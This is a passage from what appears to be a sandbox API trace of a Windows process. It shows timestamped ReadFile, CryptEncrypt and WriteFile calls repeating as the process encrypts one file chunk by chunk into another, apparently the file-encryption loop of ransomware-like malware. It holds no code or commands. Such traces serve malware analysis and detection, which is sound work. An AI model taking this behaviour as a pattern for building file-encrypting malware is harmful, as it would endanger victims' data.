hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.969] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.970] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.971] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.971] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.972] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.973] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.975] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.976] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 